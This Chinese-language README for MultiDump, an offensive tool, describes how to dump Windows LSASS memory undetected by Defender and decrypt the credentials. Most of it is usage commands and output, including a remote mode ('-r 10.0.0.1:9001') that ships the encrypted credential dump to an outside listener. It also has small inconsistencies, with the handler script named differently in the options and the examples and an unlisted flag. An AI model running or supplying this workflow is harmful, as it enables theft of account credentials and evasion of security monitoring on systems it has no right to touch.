概述

MultiDump是一个用C语言编写的后渗透工具，用于悄悄转储和提取LSASS内存，而不触发Defender警报，并配有一个用Python编写的处理程序。

博客文章: https://xre0us.github.io/posts/multidump

MultiDump支持通过ProcDump.exe或Comsvc.dll进行LSASS转储，它提供两种模式：本地模式对转储文件进行加密并在本地存储，远程模式将转储发送到处理程序进行解密和分析。

用法

用法：

用法: MultiDump.exe [-p ] [-l | -r ] [--procdump] [-v]

• -p：指定保存procdump.exe的路径，使用完整路径。默认为当前目录。
• -l：指定保存加密转储文件的路径，使用完整路径。默认为当前目录。
• -r：设置连接到远程处理程序的ip:port。
• --procdump：将procdump写入磁盘并使用它来转储LSASS。
• --nodump：执行相同的操作，但不转储LSASS，程序将按预期失败。
• -v：启用详细模式。
  MultiDump默认在本地模式下使用comsvcs.dll，并将加密的转储保存在当前目录中。

示例：

MultiDump.exe -l C:\Users\Public\lsass.dmp -v
MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000

在这些示例中，MultiDump以本地模式运行，首先使用comsvcs.dll，并将加密的转储文件保存在当前目录中。第一个示例使用了参数-l，指定了转储文件的完整路径为C:\Users\Public\lsass.dmp，并启用了详细模式（-v）。第二个示例使用了--procdump参数，指定了procdump.exe的完整路径为C:\Tools\procdump.exe，同时通过-r参数设置了连接到远程处理程序的ip:port为192.168.1.100:5000。

MultiDumpHandler.py [-h] [-r REMOTE] [--override-ip OVERRIDE_IP] [-l LOCAL] [-k KEY]

远程转储处理程序

选项：

• -h, --help：显示帮助消息并退出
• -r REMOTE, --remote REMOTE：用于接收远程转储文件的端口
• --override-ip OVERRIDE_IP：在远程模式中手动指定用于密钥生成的IP地址，用于代理连接
• -l LOCAL, --local LOCAL：本地转储文件，需要密钥进行解密
• -k KEY, --key KEY：解密本地文件所需的密钥

与所有与LSASS相关的工具一样，需要Administrator/SeDebugPrivilege特权。

Pypykatz用于解析转储文件，请确保使用pip3安装。如果看到错误信息“All detection methods failed”，很可能是版本过时。

默认情况下，MultiDump使用Comsvc.dll方法，并将加密的转储保存在当前目录中。

MultiDump.exe
...
[i] Local Mode Selected. Writing Encrypted Dump File to Disk...
[i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

MultiDump.exe
...
[i] 选择了本地模式。正在将加密的转储文件写入磁盘...
[i] C:\Users\MalTest\Desktop\dciqjp.dat 已写入磁盘。
[i] 密钥：91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

使用上述命令，将运行 ProcDumpHandler.py，指定要处理的转储文件为 dciqjp.dat，并提供解密所需的密钥为 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e。

如果使用了 --procdump 选项，将会将 ProcDump.exe 写入磁盘以进行 LSASS 转储。

在远程模式下，MultiDump 将连接到处理程序的监听器。

./ProcDumpHandler.py -r 9001
[i] Listening on port 9001 for encrypted key...

使用上述命令，将运行 ProcDumpHandler.py，并在端口9001上等待加密密钥的到来。

MultiDump.exe -r 10.0.0.1:9001

使用上述命令，MultiDump.exe 将连接到10.0.0.1的端口9001。

密钥使用处理程序的IP和端口进行加密。当MultiDump通过代理连接时，处理程序应使用 --override-ip 选项手动指定在远程模式下用于密钥生成的IP地址，确保解密通过将解密IP与在MultiDump -r 中设置的期望IP进行匹配而正确工作。

项目地址

https://github.com/Xre0uS/MultiDump

参考文献

https://github.com/Xre0uS/MultiDump